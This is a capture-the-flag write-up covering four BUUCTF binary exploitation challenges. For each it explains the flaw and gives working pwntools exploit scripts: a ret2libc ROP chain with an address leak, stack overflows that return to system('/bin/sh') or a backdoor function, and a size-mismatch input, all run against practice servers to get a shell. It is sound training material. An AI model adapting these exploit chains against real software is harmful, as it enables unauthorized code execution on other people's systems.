PWN-PRACTICE-BUUCTF-3
- [OGeek2019]babyrop
- ciscn_2019_n_8
- get_started_3dsctf_2016
- jarvisoj_level2
[OGeek2019]babyrop
A simple ret2libc; build a ROP chain.
main reads a random number into buf and passes it to sub_804871F.
A leading "\x00" bypasses strlen and strncmp, and buf[7] is used as the return value.
The buf[7] returned by sub_804871F is then used as the length to read; setting it to 255 gives a stack overflow.
Finally the ret2libc script. Using io.sendline() did not work at first: it appends a "\n", and with the buffer already filled to capacity that extra "\n" meant write_addr could not be printed. Switching to io.send(), which does not append "\n", fixed it.
```python
from pwn import *

io = remote('node4.buuoj.cn', 29571)
elf = ELF('./pwn')
libc = ELF('./libc-2.23-16-x32.so')

# Leading "\x00" gets past strlen/strncmp; buf[7] = 255 becomes the read length.
payload = b"\x00" + b"a" * 6 + p8(255) + b"b" * 24
io.send(payload)
io.recvuntil(b'Correct\n')

write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = 0x08048825

# Leak the runtime address of write: write(1, write_got, 4), then return to main.
payload = b"a" * (231 + 4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
io.send(payload)
write_addr = u32(io.recv(4))
print(hex(write_addr))

libc_base = write_addr - libc.sym['write']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))

# Second pass through the same check, then system("/bin/sh").
payload = b"\x00" + b"a" * 6 + p8(255) + b"b" * 24
io.send(payload)
io.recvuntil(b'Correct\n')
payload = b"a" * (231 + 4) + p32(system) + p32(0xdeadbeef) + p32(binsh)
io.send(payload)
io.sendline(b"cat flag")
io.interactive()
```
ciscn_2019_n_8
main checks whether var[13] == 0x11 holds.
The elements of var are all _DWORD, i.e. double words: four bytes, 32 bits.
But the if statement on line 13 reads a _QWORD starting at the address of var[13], i.e. a quad word: eight bytes, 64 bits.
So the input can be built as thirteen 32-bit values followed by one 64-bit 0x11; the check passes and the system call is executed.
```python
from pwn import *

io = remote('node4.buuoj.cn', 28433)
io.recvuntil(b"What's your name?\n")
# 13 zero DWORDs, then a 64-bit 0x11 covering the QWORD read at var[13].
payload = p32(0) * 13 + p64(0x11)
io.sendline(payload)
io.sendline(b"cat flag")
io.interactive()
```
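As an added illustration (not code from the write-up), the width mismatch described above in C: a check that loads 64 bits at var[13] silently compares the word that follows it as well, whereas a check at the declared element width reads only var[13]. The array length, the trailing word (standing in for whatever follows var[13] in memory) and the sample values are constructed; the 8-byte load is evaluated as on a little-endian machine.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed for this example: 15 words, so one word sits after var[13]
 * and the 8-byte load below stays inside the array. */
enum { NWORDS = 15 };

/* The check as the write-up describes it: an 8-byte load at &var[13]. On a
 * little-endian machine this compares var[13] AND var[14] against 0x11. */
int check_wide(const uint32_t var[NWORDS]) {
    uint64_t v;
    memcpy(&v, &var[13], sizeof v);
    return v == 0x11;
}

/* The same check at the element's declared width: only var[13] is read. */
int check_declared_width(const uint32_t var[NWORDS]) {
    return var[13] == 0x11;
}

/* Lay var out the way the write-up's input is: 13 zero DWORDs, then 0x11
 * in var[13]; `trailing` is whatever lands in the word after it. */
void build_input(uint32_t var[NWORDS], uint32_t trailing) {
    memset(var, 0, NWORDS * sizeof var[0]);
    var[13] = 0x11;
    var[14] = trailing;
}

int main(void) {
    uint32_t var[NWORDS];
    build_input(var, 0);
    printf("trailing 0: wide=%d declared=%d\n", check_wide(var), check_declared_width(var));
    build_input(var, 1);
    printf("trailing 1: wide=%d declared=%d\n", check_wide(var), check_declared_width(var));
    return 0;
}
```

With a zero trailing word both checks pass; with any non-zero trailing word the wide check fails while the declared-width check still passes, which is why the input must end in a full 64-bit 0x11.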
get_started_3dsctf_2016
A statically linked ELF.
There is a stack overflow in main; overwrite eip with the backdoor function get_flag.
When building the payload, note that main addresses its locals via esp, so there is no ebp to overwrite: once the buffer is filled, eip is overwritten directly.
The return address that follows cannot be arbitrary; find an exit function and use its address.
Finally append the two arguments that get_flag checks.
```python
from pwn import *

io = remote('node4.buuoj.cn', 28168)
get_flag = 0x080489A0
exit_addr = 0x0804E6A0   # address of exit; named exit_addr so it does not shadow the builtin

# main addresses via esp, so 56 bytes of padding reach eip directly (no saved ebp).
payload = b"a" * 56 + p32(get_flag) + p32(exit_addr) + p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()
```
jarvisoj_level2
A simple stack overflow, ret2syscall.
The executable keeps system and also provides hint, which is the string "/bin/sh".
Use the stack overflow to overwrite eip with system, passing hint as the argument, to get a shell.
```python
from pwn import *

io = remote('node4.buuoj.cn', 26226)
elf = ELF('./level2')
io.recvuntil(b"Input:\n")

hint = elf.sym['hint']        # the "/bin/sh" string
system = elf.plt['system']
main_addr = 0x08048480

payload = b"a" * (136 + 4) + p32(system) + p32(main_addr) + p32(hint)
io.sendline(payload)
io.sendline(b"cat flag")
io.interactive()
```